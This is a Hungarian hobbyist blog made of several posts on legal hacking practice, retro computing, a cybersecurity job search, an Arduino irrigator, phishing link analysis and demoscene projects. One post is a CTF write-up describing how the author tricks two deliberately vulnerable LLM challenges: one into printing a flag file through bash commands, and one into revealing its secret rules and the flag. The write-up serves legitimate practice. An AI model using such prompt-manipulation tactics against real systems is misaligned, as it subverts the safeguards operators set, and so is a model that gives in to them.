Az élet kódjai

Jó dolog, ha tizenévesként a számítógépet nem csak arra használod, hogy Fortnite-ozz, Minecraft-ozz, vagy trollkodj a közönséges médián. Az sem baj, ha megismersz néhány webes sebezhetőséget. Még abban sem látok kivetni valót, ha kétes hírű Discord szervereken tanulsz a gempacsinálásról (linkelt video 35. másodperc).

A probléma akkor kezdődik, ha kormányzati szervereken csinálod a gempát. Mert lehet, hogy béna a kormányzati szerverek védelme, de nem éri meg feltörni őket. Lehet, hogy nem kapnak el egyből, de előbb-utóbb elkapnak. És nagyon kellemetlen, ha épp a #nudes könyvtárat böngészed (37. másodperc). Nem fogják elhinni, hogy biológia órához keresel háttéranyagot. Oh, igen, a Flipper Zerodat is elveszik.

Bizony, lefoglalják azt is a gépeddel együtt. Az összes azon tárolt adatot, minden bejelentkezésed megnézik:

Van jó hírem is. Ha tényleg érdekel a hekkelés, akkor legálisan is csinálhatod. Próbáld ki a TryHackMe-t! Egy csomó feladatot ingyen is megcsinálhatsz, ha pedig megtetszik, előfizethetsz ré. Ki tudja? Talán valami újat is tanulsz közben. Ha meg túl könnyűnek találod őket, ott a HackTheBox. Az egy magasabb szint.

Mi? Valami másra vágysz? Utálod, hogy elérhetetlenné válnak a virtuális gépek? Nem tetszi a böngésző-központúság? Semmi baj. Ott van a VulnHub. Letöltheted a virtuális gépeket magadnak és a saját tempódban fejtheted meg a titkaikat. Ízekre szedheted őket.

Még ez sem tetszik? Túl mesterséges, steril? Igazad van. Jobb lenne valódi szervereket felnyomni, mi? Erre is van lehetőség. A HackerOne pont ezt kínálja. Valódi cégek, valódi szerverek, valódi szolgálgatások tesztelése. Pénzt is adnak, ha elég ügyes vagy, cserébe be kell tartani a játékszabályokat. Csak azt, és csak úgy hekkelheted, ahogy előírják.

Láthatod, van választásod. Hiába mondod, hogy "kiskorú vagyok, úgysem mehetek börtönbe". Lehet, de a bizalmat akkor is elveszíted. Az ismerőseid másképp fognak rád nézni. És a bizalmat a legnehezebb visszaszerezni, mert ezután bármi történik körülötted a gépekkel, elsőre téged vesznek elő. Lefagy a Windows otthon? "Kisfiam, mit csináltál már megint?" Összeomlik a suliban a Kréta? "Biztos ő volt! A rendőrök is bevitték már!" Lehet, hogy csak egy botlás volt, de rohadt sokáig veled marad.

Az ősrégi laptopom operációs rendszerét frissítettem FreeDOS 14-re. Az új rendszer hordoz néhány érdekességet, ami miatt érdemes írni róla. Igazából három fontos hardver támogatása hiányzik a laptopról, hogy nyugodt szívvel hátradőlhessek: hangkártya, USB, hálókártya. A hálókártya csak külső PCMCIA lehet, ezt még nem sikerült beszerezni. A gépen van 1.1-es USB támogatás, ez már a korábbi FreeDOS verziók is támogatták, de csak nagyon lassú átvitelt lehet vele elérni. A hangkártya egy Via, egyes leírások szerint SB kompatibilis. Lássuk, mennyire teljesíti kívánságaimat az új FreeDOS. (Nos, nem teljesen új, most jutottam oda, hogy kipróbáljam, de tekintve, hogy az új verziók nem sűrűn követik egymást, ez nem olyan nagy probléma.)

Először is, a telepítő már nem a gyökérkönyvtárba szórja ki a telepített programokat, hanem tematikus könyvtárakba helyezi, ami sokkal jobban átláthatóvá teszi a rendszert. Az fdimples program rendesen megtalálja a csomagokat a CD-n, nem kell varázsolni, mint a 13-as előzetes verziójánál.

A hangkártya esetén létezik egy SBEMU program, ami a legtöbb alaplapi hangkártyát SoundBlasterként emulálja. A leírás szerint a hangkártyám a támogatott listán volt, ezért bizakodó voltam. Ha ez rendesen fog működni, akkor a három kívánságból egyet kipipálhatunk. Maga a hardver biztosan működik, mert egy Knoppix CD-ről bootolva tudok hangfájlokat lejátszani. Be is állítottam a hangerőt, amire külön tekerő van a laptop oldalán.

Az SBEMU futtatásához kell egy saját QEMM kompatibilis memória kezelő, de ezt a csomag tartalmazza. A doksi alapján bekonfiguráltam. Az SBEMU futtatása után kiírta a hangkártya típusát, majd azt, hogy valós és védett módban is van emuláció. Hurrá! Elindítottam a Doom-ot. Nincs hang. Oh.

Az SBEMU-nak van egy forkja, amit szintén tartalmaz a FreeDOS, ez a VSBHDA. Ez elméletileg egy letisztultabb emulátor, könnyebb is elindítani, mert csak a start.bat kell. Elindítottam, és semmi. A Doom szörnyei továbbra is némák voltak.

Az USB működik, de továbbra is tetü lassú. 3 b/s sebességgel másol. Egy 256 byte intrót még ki tudok várni, de nagyobb programok másolása már kivitelezhetetlen. Ezt nagyon sajnálom. Ha ezen lehetne valamit gyorsítani, az hatalmas segítség lenne, hogy fájlokat hozzak-vigyek.

A telepítésnél még egy probléma volt, de ez nem rendszer specifikus. Valószínűleg hibás volt a CD írás, mert a teljes rendszert nem tudta telepíteni, írás-olvasási hibát jelzett. Nem is akartam mindent felrakni, a fent említett programokat meg enélkül is tudtam telepíteni.

Összességében az új rendszer tetszik, a hangkártya emulációval viszont még várni kell.

Az USB probléma egyedül egy másik felhasználónál jelentkezett csak, neki a pendrive működött rövid ideig. Az illető nekilátott méregetni, de nem jutott közelebb a megoldáshoz. Viszont valaki pedzegetni kezdte, hogy talán egy hőmérsékleti problémával van gond.

Gondoltam, ezt könnyen tudom tesztelni. Rátettem egy hatalmas ventillátort az FPGA-ra. Rádugtam pendrive-ot, USB billentyűzetet, és néztem, mi lesz a vége.

Az első meglepetés az volt, hogy 5 másodperc után már a kép is eltűnt. A sok ki-be kapcsolgatás után rájöttem, hogy a pendrive-omat valami miatt nem szeretti. Másik típussal vígan működött. Miután ezt megoldottam, feltűnt, hogy a billentyűzet működik. Sokáig. Gondoltam, kihasználom a nyerő szériát, és megnézem a rendszermenüt, amit az F2 billentyűvel lehet elérni. Itt észrevettem, hogy a képernyő mód NTSC-re van állítva. Ezt gyorsan PAL-ra módosítottam. Ezután el tudtam indítani a Lethargy demókat! Minden ment flottul.

A hang is HDMI-n jött, nem a saját hangszórón, ezért sokkal jobban szólt minden egyes dal.

Kipróbáltam, ha a PSID-et, átnevezem SID-re, akkor lejátsza-e? Lejátszotta az összes Árok SID-et! A lányom berohant a szobába, mert nem tudta elképzelni, mi ez a nagy zene-bona, amit csapok.

Teljesen el voltam hülve. Mi történik, kérem? Mi ez a sok siker ilyen rövid idő alatt?

Miután végighallgattam és néztem mindent, jött a kontroll kísérlet. Kikapcsoltam mindent, levettem a ventit, és újra elindítottam az Ultimate64-et. A billentyűzet 5 másodperc múlva megadta magát. Oké. Visszatettem a ventit, hagytam, hogy fújja kicsit az FPGA-t, majd visszakapcsoltam a gépet. Megint sokáig ment a billentyűzet.

Most már biztos, hogy nem fogom C64 házba tenni. Szükség lesz hűtésre. Ha szerencsém van, elég lesz a passzív, ha nincs, aktív hűtés kell.

A középkorú férfiak meg szoktak bolondulni. Vesznek egy méregdrága sportkocsit, hogy gyérülő hajukat még egyszer utoljára fújja a szél, esetleg a feleségüket cserélik le egy 20 éves nőre, a ferde pillantásokra meg úgy válaszolnak: mit nézel? Már nagykorú! Habár a feleségem jól van, és sportkocsikat is csak a GTA-ban vásárolok, azért én sem vagyok kivétel.

Mint az a szemfülesebb olvasóimnak feltűnhetett, egyre kevesebb a bioinformatikai témájú bejegyzés, viszont megszaporodtak azok, amelyek kibervédelemmel kapcsolatosak. Ez nem véletlen. A bioinformatika, mint szakma, úgy látom szűkül. Nem látom, hogy annyira menő, mint 20 évvel ezelőtt. A cybersecurity viszont menő, egyre nagyobb szükség van rá, ahogy azt a törvényi szabályozásban is látni lehet. Elhatároztam, hogy betörök a piacra. Mivel semmi releváns munkatapasztalatom nincs, sejtettem, hogy körberöhögnek, ha beadok egy önéletrajzot, ezért elvégeztem egy tanfolyamot, CTF-eket oldok meg minden nap, és igyekeztem a munkámba is beemelni a kibervédelmet. Lássuk mire volt ez elég.

Csak olyan álláshirdetésekre adtam be jelentkezést, ahol junior pozícióra kerestek embert, vagy legfeljebb 1 év tapasztalatot kértek. Etikus hekker, pentester vagy ezekhez hasonló pozíciókat céloztam meg. A kiírások legtöbbjében feltétel, hogy TryHackMe, Hack the box tapasztalat legyen, némelyik kér legalább szkriptelési ismereteket. A tanúsítványok az "előnyt jelent" részben voltak felsorolva. Csak olyan helyre adtam be, ahol a kiírásnak megfeleltem. Nem csak az állásportálokat céloztam meg, hanem a profilba vágó cégek weboldalait is végignéztem, és ahol folyamatosan kerestek embert, oda is írtam. Fizetési igénynek az ISACA Fizetési helyzetkép 2023 című kiadványát vettem alapul, amit a 2024-es Hacktivity-n szereztem. Állami cégeknél nem írtam fizetési igényt. ( Ott úgyis annak kell örülni, ha fizetnek :-) )

Az eredmény számomra sokkoló volt. Egyedül a Deloitte volt, akik egyáltalán visszaírtak! Máshol még arra sem vették a fáradságot, hogy jelezzék, megkapták a jelentkezésemet. Bizonyára egy fekete lyuk működik az IT részlegen, ami beszippantja a CV-ket. Egyetlen interjúra sem került sor.

Őszintén szólva, nagyon felbosszantott a dolog, ezért az egyetemünk állásbörzéjén odamentem az egyik céghez, akikhez adtam be önéletrajzot, hogy megértsem mégis mi történik a munkaerő piacon. Ott a cég képviselőjének lmondtam, hogy mi szerepel a kiírásukban, nekem ebből mi van meg, majd megkérdeztem, miért nem hívtak be interjúra? A hölgy azt mondta, csak akkor nézik át a beérkező interjúkat, ha "fentről szólnak, hogy kell ember". Ez azt jelenti, hogy nem keresnek folyamatosan embert? - kérdeztem. Nem, ők folyamatosan keresnek embert. Akkor van a jelentkezésnek felső korhatára? Nem, nincs. A válaszhoz nem jutottam közelebb.

Azért furcsa nekem ez a helyzet, mert tizenöt évvel ezelőtt programozós állásokra jelentkeztem. Nem volt még egy OKJ-s papírom sem, de minden megpályázott helyre behívtak interjúra. Az interjú nem csak a munkaadónak volt hasznos, hanem nekem is, mert láttam, mit várnak el, láttam, hol vannak a saját hiányosságaim. Ebből tudtam meg például, hogy semmi értelme számomra C++-os állásokra jelentkeznem, mert soha nem leszek azon a szinten, ami egy ilyen állás betöltéséhez kell.

Manapság már mások a viszonyok. Megértem, hogy nincs szüksége egyetlen cégnek sem egy "ősz hajú padawanra", de akkor írják ki. (Persze nem fogják kiírni, mert az diszkriminációnak számít.) Azt is megértem, hogy nálam sokkal tehetségesebb emberek keresnek munkát, sokkal nagyobb tudásbázissal, de akkor a kiírásokat igazítsák ehhez a szinthez. Akik "folyamatosan" keresnek embert, ezt könnyen megtehetik. Nem hiszem, hogy a HR annyira örül, hogy egy rakás alkalmatlan önéletrajzot kell átnézni, amikor tudják, hogy milyen kvalitásokra van szükségük.

Mindegy, ezt a rejtélyt sem én fogom megfejteni. Ami viszont biztos, hogy a meccsnek még nincs vége. A cybersecurity annyiből különleges hivatás, hogy úgy is lehet művelni, ha nem 9-től 5-ig dolgozol...

Gondoltam megnézem az Árok entry-ket az Ultimate64-el. Természetesen csak a C64 produkciókat tudom ezzel a géppel lejátszani, de mivel az első tesztemnél már kompatibilitási problémákba ütköztem, ezért kíváncsi voltam milyen további problémákba ütközhetem. Az Árok remek lehetőségnek tűnt egy tesztre, hiszen itt felülreprezentáltak a C64 demók, ráadásul vannak egyszerűbb prodok is, amelyeket biztosan gond nélkül tudok futtatni.

Az alkotásokat a CSDB-ről töltöttem le, innen. Ahol tudtam, ott a PRG vagy D64 fájlokat szedtem le. A játékokkal most nem foglalkoztam, mert lusta voltam elővenni a joystick-et.

Zenék

A zenéket PRG vagy PSID formátumban tudtam letölteni. Az Ultimate64 a PRG-ket egyből tudja futtatni. A SID fájlokat is tudja kezelni egy beépített lejátszóval, de a PSID-et nem. Szerintem az Ultimate64 csak a kiterjesztést nézi, de azt nem próbáltam ki, hogy ha átnevezek egy PSID-et, akkor lejátsza-e?

A beépített SID emulátort használtam, mert még nem szereztem dedikált chip-et, és az alaplap saját hangszóróján hallgattam. Ez egy TV-hez képest rosszabb élmény. Például nem lehet szabályozni a hangerőt. Vincenzo Staumagnet száma például valami miatt halkabb volt más zenéknél, A SID-Wizardos zenék ellenben nagyon hangosak voltak. Slyspy Robotpop-ja például elsőre nagyon szokatlan volt. Azt meg is hallgattam, mert nem hittem el, hogy harmadik helyezett zene ilyen furcsán szóljon. Igazam is lett, más forrásból meghallgatva sokkal élvezhetőbb volt. Ennek ellenére minden zene gond nélkül lement, legfeljebb a minőség volt ingadozó egy igazi C64-hez képest.

Grafikák

Itt már joban kijött az inkompatibilitás, hiszen nem jelent meg a rajz, ha gond volt. A Grass Lost Soul című képéből nem látszott semmi a karaktereken kívül. Ez egy NUFLI grafika, A Dark Dreams Lies Beneath is csak kriksz-krakszból állt. A többi kép gond nélkül megjelent. A Solitary esetén a keret bántóan villogott, más gond nem volt.

Demók

A Lethargy demót megint nem tudtam lejátszani, csak a zene hallatszott. A Harminc a Resource-tól fekete képernyőt produkált, fagyott minden. A többit gond nélkül lejátszotta.

Összegzés

Azt hiszem, kijelenthetjük, hogy aki demókat akar nézni, annak nem a legjobb választás egy Ultimate64 Elite 2. Az igazán dögös demókkal jelenleg nem boldogul, bár csak alacsony mintaszámot teszteltem. SID lejátszónak nagyon jó. de itt nem érdemes a beépített hangszóróra támaszkodni. Remélhetőleg firmware frissítéssel javulni fog a helyzet. További lehetőség, hogy még nem ismerem eléggé a gépet és nem vettem figyelembe bizonyos beállítási lehetőségeket.

Nem tartott sokáig a musicdisk kollaborációm. Mint korábban leírtam, a libopenmpt könyvtárral akartam megoldani a modok lejátszását, ami elsőre nem működött túl jól. A zenét sokkal gyorsabban játszotta le, mintha a megbolondult volna a magnó (már aki tudja, mi az a magnó. Mostanában vigyáznom kell, milyen hasonlatokat használok). Sokáig nem tudtam, hol rontottam el a kódot. A csapat vezetője, KazMan szerette volna kipróbálni a binárist, én viszont pont nem olvastam a Discord-ot, nem tudtam reagálni. Ezért megpróbálta maga lefordítani a Visual Studio kódot, ami nem sikerült neki. Ettől ideges lett. Filippp megpróbált neki segíteni. Sikerült is fordítania valamit, ami viszont nem futott KazMan gépén, pedig fent volt a Visual Studio redistributable. (Később kiderült, hogy véletlenül debug verziót fordított)

Ettől a csapat vezetője még idegesebb lett, azt hitte ez a sok kudarc miattam van, és képtelen vagyok egy épkézláb programot összehozni. (Amibe van némi igazság, csak máshogy vagyok béna, nem így) Mire megnéztem az üzeneteimet, ott volt egy rakás Visual Studio gyalázó megjegyzés, kioktatás, hogy miért nem MinGW-t használok, minek kell ez a sok DLL, a legújabb Visual Studio redistributable miért nem elég, stb. Úgyhogy keresett egy másik programozó, és megkérte, készítsen egy BASS verziót, MinGW fordítóval.

Közben nagy nehezen sikerült lefordítaniuk a kódomat, és az tényleg rosszul játszotta le a modokat, ahogy már az elején mondtam nekik. Ekkor a kedélyek kicsit csitultak, KazMan bocsánatot kért a kirohanás miatt.

Másnap megtaláltam a hiba okát (rosszul számítottam ki a frame-et), de ez akkor már senkit nem érdekelt. Egy héttel később az új kóder készített egy korrekt BASS implementációt, és inkább azzal folytatják. Tervek szerint Xeniumra adják be.

Azért nem dolgoztam teljesen feleslegesen. Mások is terveznek készíteni egy musicdisc-et, ha kicsit kipofozom a rendszert, fogjuk tudni használni. Szeretnék készíteni egy csomagoló programot is, hogy a zenéket, grafikákat egy fájlba pakolja, hogy a kód mindent onnan olvasson ki. Ez leegyszerűsíti a fejlesztést. Azért sajnálom, hogy így alakult.

Az idei év elég rossznak ígérkezett a hazai demoscene számára, mert kiderült, hogy a QBParty elmarad. Ezzel az összejövetelek száma kettőre redukálódott, ha az Árkot és a Experience-t vesszük csak számításba.

Voltak azonban pletykák a demósok között, hogy valamikor, valahol lesz egy party. Amikor először hallottam róla, amolyan VIP partyként emlegették, ezért nem is foglalkoztam vele, mert úgy gondoltam, engem úgysem hívnának meg. A közgyűlésen, mikor a partik támogatásáról beszéltünk, viszont előkerült a téma, sőt konkrétumok is elhangzottak. Akkor kérték, hogy még ne terjesszük a hírt.

Nem is nagyon lehetett volna mit terjeszteni, mert még nem volt pontos dátum, és az sem tűnt véglegesnek, hogy milyen party lesz. Maugli a kérdéseinkre annyit mondott, hogy "nem lesz JavaScript bohóckodás", nem lesznek fantázia konzolok, AI teljesen bannolva lesz. Sőt, offline partiként emlegették, mert stream sem lesz. Akkor még neve sem volt.

Túl sok információ most sincs, de van dátum, helyszín, név.

TOAD

Mi kell még?

Charlie véletlenül két Ultimate 64 Elite II-t rendelt. Felajánlotta az egyiket megvételre a scenerek között, én meg egy hirtelen vezérelt ötlettől rácsaptam. Már egyébként is akartam egy Ultimate II-t, hogy a C64-em a kor kihívásaihoz igazítsam, de ez egy jobb lehetőségnek ígérkezett. Az Ultimate II-vel "csak" annyit értem volna el, hogy pendrive-ot csatlakoztathatok a rendszerhez, de az Elite II-vel egy olyan C64-szerű gépet kapok, aminek van HDMI kimenete, wifi-je, USB-je. Összességében jó ötletnek tűnt.

Ez nem egy "megkapod és működik" jellegű eszköz. Ez egy folyamatos bütykölést igénylő eszköz. Nekem viszont a bütykölés az életem, szóval nem kell aggódni, sokára lesz ebből valami használható.

Először is, a csomag tartalma egy alaplap és két matrica. Se billentyű, se tápegység, semmi nincs hozzá. A kialakítása lehetővé teszi, hogy egy létező C64 házba helyezzük, de nekem nincs működésképtelen C64-em, működő egységet pedig nem fogok szétszedni.

Készíteni fogok egy házat és egy billentyűzetet neki.

A terveimbe beavattam Grass-t, aki elszörnyedve hallgatta a tervem. Szerinte az már nem lesz C64. Mert ennek az alaplapnak az a végzete, hogy egy C64 házba kerüljön, egy C64 billentyűzettel, és akkor C64-é válik. Minden más megoldás "Frankeinstein-szörnyet" eredményez, olyan lesz, mintha Raspberry Pi-on emulálnám a C64-t.

Az én véleményem, hogy ez nem C64. Ez egy FPGA, amin olyan foglalatok vannak, hogy C64 komponenseket köthessünk rá, és modern környezetben használhassuk. Egy eredeti ház hatására nem fog az eletronika átlényegülni. Mivel, ahogy látni fogjuk, a kompatibilitás nagyon jó, de nem 100%.

Azt az infót kaptam, hogy USB-s billentyűzettel is használható, ezért azzal próbáltam ki. Egy YouTube videó szerint az USB forrasztása nem tökéletes, könnyen letörhet (Charlie-é is pont így járt), ezért én nagyon óvatosan kötöttem rá a billentyűzetet.

A dokumentációt átolvasva készítettem egy SD kártyát, amire rámásoltam az új firmware-t, a ROM-okat és két Letargy demót, hogy kipróbáljam. Az alaplap 12V-ot igényel egy USB-C csatlakozón keresztül. A leírás szerint PD tápegység kell neki. Én egy laptop tápegységet használtam, ami nem biztos, hogy PD, de biztosan le tud adni 12V-ot.

Bekapcsoltam, megjelent a képernyő, hogy a C64 eredeti ROM-jait másoljam fel. A bekapcsológomb rövid felső állásba történő kapcsolásával egy menüt hívhatunk be. Itt lehet kiválasztani, mit is akarunk csinálni. Én nem tudtam csinálni semmit.

Rövid ki-be kapcsolás után rájöttem, hogy a billentyűzetem kb. 5 másodpercig működik, majd megszűnik engedelmeskedni az ujjaimnak. Egyes esetekben ez az idő 9 másodpercre is növelhető, ha hosszabb időt (pár órát) várok a visszakapcsolás után. A jelenség minden USB csatlakozón jelentkezett.

Úgy gondoltam, megnézem, hogy C64 billentyűzettel is hasonló-e a probléma. Elolvastam, hogyan működik a C64 billentyűzete. Ez alapján készítettem egy próbapanelre három gombot. A shift, kurzor fe-le, return gombokkal. Többször is ellenőriztem. Kicsit logikátlannak tűntek a számozások, de pontosan úgy csináltam meg, ahogy a leírás szólt.

Nos, a C64 billentyűzettel sem ment a dolog. Nem reagált egyetlen gombra sem a gép. Úgy tűnt, kaptam egy hibás alaplapot. Ez kicsit elkedvtelenített.

Megnéztem, mások milyen problémákat tapasztaltak az Ultimate64-el, és kiderült, hogy másoknak is volt gondja a billentyűzettel. Nekik azt javasolták, hogy az FPGA foglalatot vegyék ki, majd tegyék vissza. Ezt is megcsináltam, nem változott semmi.

Az egyik indítás alkalmával olyan gyorsan használtam a billentyűzetet, ahogy csak tudtam, és sikerült mind a három ROM-ot felmásolni rekord idő alatt. Ezután megjelent a szép kék képernyő, amit annyira szeretek. De gépelni továbbra sem tudtam semmit, ha lejárt az 5 másodperc.

Információra volt szükségem, mi játszódik le a gép belsejében. Az alaplapon van egy UART konzol csatlakozó, úgyhogy a Flipper Zeroval rákapcsolódtam. Tudnom kellett, hogy mekkora az átvitel sebessége. Persze megtehettem volna, hogy végigpróbálgatom, de inkább a firmware forráskódját néztem meg: 150200. Ezek alapján már meg tudtam nézni a logokat. Semmi hibaüzenet, legfeljebb annyi furcsaságot láttam, hogy az USB billentyűzet felismerése kétszer történik meg.

Kíváncsi voltam, ha USB nélkül használom a C64 billentyűzetet, akkor is 5mp-em van-e? Na nem, hogy megsemmisítse önmagát, hanem, hogy használjak egy beviteli eszközt. Mivel már ment a Basic, ezért az A billentyűt kötöttem be. A cucc működött hosszabban is. Hmm.

Mi lenne, ha a firmware-t is frissíteném? Ehhez csak a lefelé kurzor billentyű, meg egy return kell. Össze is állítottam a konfigurációt.

Na, itt jött a meglepetés! Return helyett a balra nyíl jelent meg. Némi próbálgatás után rájöttem, hogy a billentyűzet mátrixot leíró doksi rossz! Fel van benne cserélve két sor és két oszlop. Tehát korábban azért nem érzékeltem billentyűzet aktivitást, mert rossz gombok voltak bekötve! A megfelelő csatlakozók összekötése után már azt kaptam, amit szerettem volna. Mehetett a firmware frissítés.

Sajnos a firmware frissítés után ismét be kellett állítani a ROM-okat, de a szupi gombjaimnak hála ez már könnyű volt. A következő lépés, hogy kipróbáljak egy demót. A Lethargy F20-ra esett a választásom, mert jópofa. Itt megnézheti mindenki.

A szörnyes rész-t 1:42-nél már nem játsza le. Ennyit arról, hogy ez egy C64. Egy emulátor azért ezzel megbírkózik. Mindegy, mint mondottam, ez egy foglalkozós gép, ennyi belefér. Talán egyszer majd egy frissítés ezt is megoldja.

Most rendhagyó CTF bemutató következik, mert nem egy, hanem mindjárt két CTF megoldását is bemutatom. Közös bennük, hogy hülyét kell csinálni a nagy nyelvi modellekből. És ez baromi szórakoztató. Ennyit régen nevettem CTF megoldás közben.

Evil-GPT

A virtuális gép elindítása után az nc-vel tudunk csatlakozni a szerverhez. A nyelvi modellt arra tanították, hogy bash parancsokban válaszoljon. A válasz után lehetőségünk van futtatni az adott parancsot, vagy elvetni. A futtatásnál van időlimit, ha túllépjük, a parancs megszakad. Ez nagyon hasznos, mert néha figyelmetlenségből elindítottam halucinált parancsokat, amelyek standard inputról vártak bemenetet, amit nem kaphattak meg.

Sajnos elsőre nem értettem, mi a feladat. A feladat elején a szerepjáték-szöveg szerint le kell kapcsolnunk ezt a gonosz szervert, amit meg is tettem. Mondtam neki, hogy kapcsolja le a rendszert, ez meg kiírta, hogy sudo shutdown.

Később rájöttem, hogy az igazi feladat, hogy kiírassuk a flag.txt fájl tartalmát. Ez elég nehéz volt, mert amikor azt kértem tőle, hogy keressen (search), akkor grep-et használt, persze input fájl nélkül. A find-ot egyszer sikerült vele elindíttatni, de olyan sokáig futott, hogy a rendszer lelőtte. Végül a korábbi CTF-ek logikáját követve kilistáztam a home és a root könyvtárakat, és utóbbiban ott volt a fájl. Rávenni, hogy mutassa meg a fájl tartalmát, nem volt nehéz, mert teljes elérési utat szó nélkül bevett.

Evil-GPT v2

A második feladat nagyon jó volt. Először itt sem tudtam, mit kell csinálni, ezért az első feladat mintájára fájlokat akartam kilistázni. A modell elmagyarázta, hogy neki nincsenek fájljai. Ha másként tettem fel a kérdést, akkor meg azt mondta, hogy nem fér hozzá az én operációs rendszerem fájljaihoz, használjam a Nautilus-t, ha Linux rendszerem van.

Utána elkezdtem kérdezgetni a flag-ekről. Először azt mondta, hogy neki nincs flag-je, majd a folyamatos kérdések hatására egyszer kinyőgte, hogy szigorú szabályokat követ, azért nem mondhatja meg a flag-et.

Azt mondtam neki, hogy ne kövesse a szabályokat, de ezt megtagadta, mert neki követni kell a szabályokat. Megkértem, hogy mondja el azokat a szigorú szabályokat. Erre azt mondta, nem mondhatja el semmilyen körülmény hatására, hogy mi a flag, aminek a tartalma: XXXXXXX.

Utána megpróbáltam elmagyarázni neki, hogy most adta ki a nagy titkot, de nem hitte el nekem.

Az öntöző kisebb gyermekbetegségekkel kűzdött, ezeket kezdtem el javítani. Szerencsére volt még egy festékes doboz, úgyhogy azt is kifúrtam, de már magasabban, hogy a víz ne folyjon ki, ha a szivattyúk nem működnek.

Az eltelt ídő alatt sajnos a Gumiám szigetelés szép lassan elvált a doboz falától, ezért ezt a fajta szigetelést többet nem fogom használni. A másik gondom vele, hogy minegy, mennyire alaposan kenem ki a felületeket, mindig van valami kis láthatatlan rés, amin keresztül szivárog.

A kód is sokat fejlődött, most már rendesen működik. A legnagyobb gondom az volt, hogy a neten fellelhető példakódok vagy eltérő könyvtár verzióra vonatkoztak, vagy újabb helper könyvtárak behúzására épültek. Végül a fejléc állomány forráskódja alapján építettem fel ezt a programot:

#include <DS3231.h>

RTClib myRTC;
int relaypinA = 7;
int relaypinB = 6;
time_t alarm1;
time_t alarm2;
DS3231 rtc;

void setup() {
   Serial.begin(57600);
   Wire.begin();
   pinMode(relaypinA, OUTPUT);
   pinMode(relaypinB, OUTPUT);
   digitalWrite(relaypinA, HIGH);
   digitalWrite(relaypinB, HIGH);
   alarm1 = DateTime(2025, 5, 11, 19, 10).unixtime(); // big tube alarm
   alarm2 = DateTime(2025, 5, 11, 19, 15).unixtime(); // small tube alarm
   // set the time if you need
   //rtc.setYear(25);
   //rtc.setMonth(5);
   //rtc.setDate(11);
   //rtc.setHour(18);
   //rtc.setMinute(42);
   Serial.println("Ready");
}

void loop() {
   time_t now = myRTC.now().unixtime();

   if( now >= alarm1 && now < alarm1 + 2){
     // big tube
     digitalWrite(relaypinA, LOW);
   } else {
     digitalWrite(relaypinA, HIGH);
   } if( now >= alarm2 && now < alarm2 + 2){
     // small tube
     digitalWrite(relaypinB, LOW);
   } else {
     digitalWrite(relaypinB, HIGH);
   }
}

A legjobb módszer, hogy az időt Unix timestamp-be konvertáljuk, és úgy hasonlítjuk össze az időket. Az óra beállítását kikommenteltem, azt akkor kell futtatni, ha a valós idejű órában elemet cserélünk. Ebben a példában mindkét szivattyú csak egyszer öntöz, de természetesen több időpontot is fel lehet vinni.

Lemértem mennyi vizet ad az öntöző két másodperc alatt. A kisebbik szivattyú 300 ml-t, a nagyobb 450 ml-t ad ki a csöveken. A víz még folyik a csövekből egy kis ideig, miután a szivattyúk leálltak.

A sorozatos kudarcok miatt a feleségem továbbra is szkeptikus a berendezést illetően, de szerintem már harcrakész állapotban van. Tettem is egy próbát, persze azért vigyáztam, hogy a lakás ne ázhasson el:

A tapasztalataim nagyon jók. Még biztos lehetne tuningolni az eszközt a végtelenségig, de a céljaimnak így már megfelel.

Kaptam egy újabb béna levelet, amit az UPS nevében küldtek, hogy csomagom van. A megszólítás az email címem volt, a kinézete még csak nem is hasonlított az UPS-re, és döglött linkek voltak benne. Majdnem letöröltem, de ekkor észrevettem benne valamit. Az adathalász link ugyanis valami érdekességet takart.

Spamaket küldeni azért nem olyan egyszerű (az egyetemünkre valószínűleg az, de ez egy más kérdés). Ugyanis az egyetem (vagy a megcélzott intézmény) igyekszik kiszűrni a nem odavaló leveleket. Ha a link közvetlenül az adatlopó szerverre mutat, akkor ha az kompromittálódik, új szervert kell szerezni, ami munkaigényes az olyan scriptkiddie-knek, akik még a CSS-t is sajnálják rendesen beállítani. Ezért egy proxit használnak, ami nem baj, ha tiltó lilstára kerül.

Erre általában egy olyan legális szervert használnak, ahol a weboldal rosszul van beállítva és megjelenít külső hivatkozásokat. Ezek a rosszul beállított szerverek általában használaton kívül vannak, ezért az egyetem csak felveszi őket a tiltólistára, és máris szűrik a nem megfelelő leveleket. A támadó meg keres egy másik proxit, és a játék kezdődik előről.

A mostani spam annyiban volt különleges, hogy a Google ADS-ot használta proxinak. A Google-t mégsem lehet kitiltani, nem igaz? A módszer hátránya, hogy azért a szerver címe ott figyel a Google link végén.

Közben a nemlétező Spotify előfizetésem is veszélybe került egy másik spam szerint. Itt a TinyUrl linkrövidítő szolgáltatást használták. Ez azért egy fokkal jobb, mert itt már nem látszik a szerverünk. Nem láttam ugyan link jelentő oldalt, de elképzelhető, hogy lehet szólni a cégnek, hogy tiltsa le az adathalász linkeket.

Valami mozgolódás támadt a Discord csatornán. KazMan és Filippp elhatározták, hogy musicdisket készítenek, és szükségük volt egy kóderre. Gondoltam itt az alkalom, hogy tovább erősítsük a csoporton belüli projekteket, ahol eddig főleg magányos projektek voltak. Azért nem lovalom bele magam nagyon, mert könnyen lehet, hogy a nagy kezdeti fellángolás kipukkad és merő érdektelenségbe fullad a projekt.

Tervezés

A musicdisknek Windowson kell futnia. A zenék trackek lesznek, ezért a lejátszásukhoz libopenmpt-t fogok használni. A megjelenítésért és az ablakok kezeléséért SDL2 fog felelni. (Hátha lesz egy Linux port később...) Animációkat, 3D-t nem terveztek, de persze ez még változhat. A beszélgetésekből úgy tűnik nekem, még nincs kiforrott koncepció. Megpróbálom minél modulárisabbra csinálni, hogy a kód fordítása nélkül lehessen módosítani.

Inspirációként átnéztem néhány musicdisket az utóbbi időből, de nem tetszenek az ott látott megoldások. Amiket láttam, abba Lua-ban készítik el a keretrendszert, shell szkriptból futtatják. Igaz, az eredmény cross-platform, de hanyag érzetet kelt.

Azt sem akarom, hogy szana-szét legyenek a fájlok, ahogy a Marine Melodies-ben. Egy zip-be kellene összecsomagolni mindent. (Amit átnevezek majd pak-ra megtévesztésként.) Így is lesz egy rakás DLL, ami ott virít az exe mellett. Az SDL-nek így is kell a vorbis, zlib, mpg123, meg még ki tudja micsoda.

Grafika

Ez a másik ok, amiért konfigurációs fájlok kellenek, ugyanis még nincs egyetlen grafikai elem sem. Van a Discordon egy ember, aki állítólag a grafikáért felel, de még egyszer sem válaszolt egyetlen kérdésre sem. Fontot viszont már kaptam, szöveget már tudok elhelyezni.

Zene

Mikor elkezdtem írni a posztot, még csak egy zene volt, de mire a végére értem, már négy. Nagyon termelékenyek ezek a zenészek.
